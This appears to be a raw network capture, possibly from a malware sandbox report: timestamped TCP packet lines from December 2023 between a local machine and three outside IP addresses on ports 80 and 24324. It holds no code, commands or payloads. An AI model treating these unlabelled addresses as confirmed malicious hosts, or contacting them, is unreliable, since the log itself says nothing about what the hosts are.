                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.423156023 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.423285961 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.423331022 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.423430920 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.423444033 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.423455000 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.423466921 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.423489094 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.423511028 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.423542976 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.423556089 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.423568010 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.423598051 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.423679113 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.423692942 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.423733950 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.423780918 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.423793077 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.423805952 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.423819065 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.423834085 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.423837900 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.423851967 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.423854113 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.423863888 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.423876047 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.423882008 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.423888922 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.423901081 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.423904896 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.423913002 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.423926115 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.423940897 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.423939943 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.423954010 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.423959970 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.423978090 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.423995972 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.424009085 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.424036980 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.424073935 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.424087048 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.424114943 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.424123049 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.424129009 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.424161911 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.424194098 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.424206018 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.424252033 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.424257040 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.424271107 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.424282074 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.424295902 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.424312115 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.424312115 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.424330950 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.424367905 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.424376965 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.424381018 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.424392939 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.424423933 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.424489021 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.424535990 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.424570084 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.424585104 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.424597025 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.424608946 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.424621105 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.424633026 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.424637079 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.424637079 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.424665928 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.424691916 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.424793959 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.424807072 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.424818993 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.424830914 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.424839973 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.424844027 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.424854994 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.424859047 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.424881935 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.424984932 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.425030947 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.425036907 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.425046921 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.425060034 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.425088882 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.425101042 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.425115108 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.425144911 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.425199032 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.425225973 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.425447941 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.425496101 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.425501108 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.425517082 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.425529957 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.425595045 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.425604105 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.425617933 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.425628901 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.425640106 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.425651073 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.425676107 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.425753117 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.425765991 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.425776005 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.425789118 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.425801039 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.425825119 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.425884008 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.425899029 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.425911903 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.425924063 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.425935030 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.425935984 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.425959110 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.425981045 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.426031113 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.426060915 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.596066952 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.596322060 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.821712971 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.839133978 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.876610041 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.876610994 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:48.102264881 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:48.119385958 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:48.152379036 CET4972224324192.168.2.6193.233.132.48
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:48.168116093 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:48.406116962 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:48.408447027 CET4972224324192.168.2.6193.233.132.48
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:48.424210072 CET4972224324192.168.2.6193.233.132.48
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:48.678412914 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:48.718085051 CET4972224324192.168.2.6193.233.132.48
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:48.972354889 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:49.022037983 CET4972224324192.168.2.6193.233.132.48
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:49.278901100 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:49.278918982 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:49.278933048 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:49.278944969 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:49.278956890 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:49.278969049 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:49.279032946 CET4972224324192.168.2.6193.233.132.48
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:49.279114962 CET4972224324192.168.2.6193.233.132.48
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:50.440772057 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:50.734584093 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:50.734663010 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:50.734914064 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:51.227591991 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:51.580056906 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:51.580080032 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:51.580180883 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:51.873018980 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:51.873043060 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:51.873055935 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:51.873070955 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:51.873151064 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.165841103 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.165862083 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.165874958 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.165884972 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.165895939 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.165906906 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.165915966 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.165927887 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.165935040 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.165982008 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.458960056 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.458978891 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.458991051 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.459002972 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.459018946 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.459031105 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.459043980 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.459055901 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.459068060 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.459074974 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.459084034 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.459100008 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.459114075 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.459127903 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.459136009 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.459141970 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.459163904 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.459182024 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.539505005 CET4972224324192.168.2.6193.233.132.48
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.751904011 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.751919985 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.751930952 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.751943111 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.751954079 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.751965046 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.751979113 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.751981974 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.751981974 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.751991987 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.752005100 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.752010107 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.752018929 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.752031088 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.752032042 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.752044916 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.752055883 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.752057076 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.752068996 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.752080917 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.752089024 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.752091885 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.752104998 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.752106905 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.752116919 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.752129078 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.752134085 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.752141953 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.752152920 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.752155066 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.752168894 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.752181053 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.752182007 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.752193928 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.752207041 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.752209902 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.752229929 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.793226004 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.793333054 CET4972224324192.168.2.6193.233.132.48
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.808605909 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.044907093 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.044925928 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.044939041 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.044953108 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.044965982 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.044979095 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.044991016 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.045003891 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.045006990 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.045017004 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.045031071 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.045062065 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.045085907 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.045116901 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.045156956 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.045185089 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.045200109 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.045247078 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.045286894 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.045299053 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.045311928 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.045324087 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.045336008 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.045340061 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.045350075 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.045362949 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.045362949 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.045387030 CET4972380192.168.2.6211.119.84.112
